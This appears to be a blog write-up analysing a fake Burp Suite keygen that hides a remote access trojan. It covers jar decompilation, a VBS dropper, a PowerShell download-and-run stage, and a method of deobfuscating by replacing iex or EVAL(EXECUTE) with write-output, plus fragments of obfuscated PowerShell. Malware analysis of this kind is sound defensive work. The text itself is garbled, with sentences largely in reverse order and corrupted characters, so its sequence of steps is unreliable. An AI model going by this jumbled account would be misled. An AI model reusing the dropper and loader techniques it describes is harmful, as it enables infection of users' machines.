![]() ![]() ( $eNv:PuBliC $eNv:pUBLiC 'x') at the beginning PS E:\burp\burploader> $eNv:PuBliC $eNv:pUBLiC 'x'Īfter executing there is more obsusication, so do it again on the new file replacing PS E:\burp\burploader> $PsHOmE $PShOMe 'X' let’s see what $PsHOmE $PShOMe 'X' evaluates to. In this case the left just consists of a bracket, so let’s check the rightmost statement after a pipe (circled). We don’t have something that looks as nice as invoke-expression this time, however since the execution will be done last it is most likely that the call will be on one of the ends, the left with the deobfusicated code as an arguement, or the right, with the code piped into the standard input. I made the mistake of missing the first section and couldn’t find some needed code later (this was found by and Instead of trying to deobfusicate the whole file at once (like I did) I learnt that it would have been better to split it 3 smaller files and do them one at a time. The first thing to notice is that the new file has three sections separated by blank lines. This time it calls Invoke-Expression instead of iex, replace it with write-output. ![]() The beginning of this fie looks like this We have yet another layer of obfusication. I was running in a new virtual machine, so I had to allow untrusted powershell scripts to execute.Īfter running powershell as an administrator: Iex (alias for invoke-expression) is a function that evaluates powershell code, so we need to replace it with write-output to print it instead, then run the file. I have also renamed co.js to co.ps1 to make the. I gziped and b64ed the file to make it upload nicely, you should do cat co.64 | base64 -d | gunzip > co.ps1 to read it This file is large, so I have uploaded it here To print the string instead of executing we can replace the EVAL(E圎cUTE(What this does is run the other downloaded file, co.js (saved as WindowsNT.ini) in powershell. Finally running the resulting string from concatenating those characters) (what this file is actually doing, is to split the long string at every * and then evaluate the expressions in the resulting list, and turning the results of the math expressions into characters. Here, clearly, the part that executes the deobfuscated code is the EVAL(E圎cUTE(www)) (circled) The easiest method to deobfuscate is to replace the part of the code that executes with something that prints (This may not work in all cases, but it is a very useful technique). Here we have obfuscated visual basic code. It then runs the visual basic script (co.vbs), so let’s look at that first This drops two more files into a newly made c:\ProgramData\WindowsNT directory Let’s download that code and have a look. This section of code contains powershell commands to download and run this powershell script The decode function decodes the base64 and writes it to a file called Data.jar Here is the important part of the decompiled java codeīefore this part is a base64 encoding of another jarfile contaning the keygen. There is a class file which can be decompiled, I will use jad, which is installed on kali. > cp burp-loader-keygen1.7.31.jar burp-loader-keygen1.7.31.zip Jars are stored as zip files so we can extract the jar with unzip. (NOTE: iirc when I originally visited the page all the scans were clean and the file name matched the file burp-loader-keygen1.7.31.jar. However the hash on virus total is different to the actual file, indicating that it’s a scan of a different file The keygen comes with a file called virus.txt which contains what appears to be a link to a virus total scan of the keygen jarfile The following is a writeup of the analysis of the RAT. As such, for legal reasons I have not included a link to the original file. Surprisingly as well as containing a remote access trojan (RAT) it actually contains a working keygen. I, along with and (please let me know if I missed anyone) decided to reverse engineer it to see if it is. Many members of these forums were suspicious of it being malware. Some random new “user” called posted some files on the forums multiple times (after being deleted by mods) caliming it was a keygen for burpsuite. Do not go running it on your computer, at least use a VM. ![]() If you decide to mess with it you do so at your own risk. DISCLAIMER: The following post contains a virus sample. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |